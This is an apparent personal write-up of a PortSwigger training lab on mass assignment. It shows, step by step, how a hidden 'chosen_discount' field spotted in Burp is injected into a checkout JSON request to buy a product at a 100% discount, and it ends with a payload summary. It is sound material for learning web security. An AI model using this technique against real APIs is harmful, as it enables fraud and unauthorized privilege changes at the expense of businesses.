[This lab](https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability) demonstrates a classic **mass assignment vulnerability** — where an attacker modifies client-side JSON to include unauthorized parameters that are **recognized and trusted by the backend**. By doing this, the attacker can trigger unintended behavior, such as applying discounts, changing user roles, or escalating privileges.
Our objective is to apply a **100% discount** to the **Lightweight "l33t" Leather Jacket** and purchase it without having the required credit.
---
##### Step 1: Add the Target Product to Your Basket
- Logged in as `wiener:peter`
- Navigated to the **Lightweight "l33t" Leather Jacket** product
- Clicked "Add to basket"
---
##### Step 2: Attempt Checkout
Clicked "Place order"
→ Application responded that the user does **not have enough credit**.
In Burp's **Proxy > HTTP history**, captured:
- `GET /api/checkout`
- `POST /api/checkout`
Noticed that the **GET response** contained a hidden field:
```json
"chosen_discount": {
"percentage": 0
}
```
But this field was **absent** from the POST request payload used during checkout.
✅ This discrepancy suggests that `chosen_discount` is a **bindable backend field** — a perfect target for mass assignment.
![[CleanShot 2025-04-14 at 19.39.57.png]]
---
##### Step 3: Replay and Modify the POST /api/checkout Request
Sent the checkout request to **Repeater**.
Original payload:
```json
{
"chosen_products": [
{
"product_id": "1",
"quantity": 1
}
]
}
```
Modified payload (with mass assignment):
```json
{
"chosen_discount": {
"percentage": 0
},
"chosen_products": [
{
"product_id": "1",
"quantity": 1
}
]
}
```
Sent → Response was accepted → No error
Tried:
```json
"chosen_discount": {
"percentage": "x"
}
```
→ Response: error about invalid data type
✅ Confirms the backend is **actively parsing and validating the field** — strong indicator of a vulnerable mass assignment binding.
---
##### Step 4: Exploit – Apply a 100% Discount
Final payload:
```json
{
"chosen_discount": {
"percentage": 100
},
"chosen_products": [
{
"product_id": "1",
"quantity": 1
}
]
}
```
Sent the request.
→ Response: 200 OK
→ Product purchased at **$0.00**
**Lab solved.**
---
## Payload Summary
##### Mass Assignment Payload to Inject Discount
```json
{
"chosen_discount": {
"percentage": 100
},
"chosen_products": [
{
"product_id": "1",
"quantity": 1
}
]
}
```
**Context:** Added a hidden field (`chosen_discount`) based on values found in a GET request
**Mechanism:** Backend binds JSON input to internal objects, allowing injection of unauthorized parameters
**Effect:** Purchases product with 100% discount
![[CleanShot 2025-04-14 at 19.42.08.png]]